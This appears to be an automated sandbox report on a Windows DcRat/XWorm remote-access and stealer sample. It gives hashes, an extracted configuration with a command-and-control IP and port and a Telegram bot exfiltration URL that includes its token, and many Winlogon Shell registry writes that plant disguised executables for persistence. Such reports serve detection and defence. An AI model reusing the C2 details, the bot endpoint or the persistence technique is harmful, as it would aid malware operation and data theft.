dcrat | 0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
30/06/2024, 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hatabat.exe
Size

13.0MB
MD5

5038e381411591332b285c540d4b6bef
SHA1

4af0f013e8652e3d03c296a59c67c70508e39612
SHA256

0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53
SHA512

3055db5a385b9e27cd6e7718a45bf1695ac0d9d798f7089276baf0542227768d5b1d6eb72ddb493a27b346af77c0d40a6a4474beddf77c24eed7b9cf3b06769b
SSDEEP

393216:064QwP3EQ5H+i4IDzQTj4pUbZFdoPgY2:0647P3J5eRInQT0pkFmP2

Score

10^/10

dcrat xworm execution infostealer persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

147.185.221.17:14348

147.185.221.17:14348:14348

Attributes

Install_directory
%AppData%
install_file
sgredgkrtf09weut3r435.exe
telegram
https://api.telegram.org/bot7150716400:AAE41jshl4_joK29lZ3HuflfsurF6ZZKlDg/sendMessage?chat_id=5187782651

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023438-42.dat	family_xworm
behavioral2/memory/1816-53-0x0000000000460000-0x0000000000476000-memory.dmp	family_xworm

Modifies WinLogon for persistence 2 TTPs 37 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\", \"C:\\Windows\\Branding\\shellbrd\\smss.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\", \"C:\\Windows\\Branding\\shellbrd\\smss.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Users\\Default User\\TextInputHost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\", \"C:\\Windows\\Branding\\shellbrd\\smss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\", \"C:\\Windows\\Branding\\shellbrd\\smss.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Users\\Default User\\TextInputHost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\conhost.exe\", \"C:\\Windows\\en-US\\conhost.exe\", \"C:\\Windows\\CbsTemp\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Mail\\powershell.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\""	amamamsus.exe
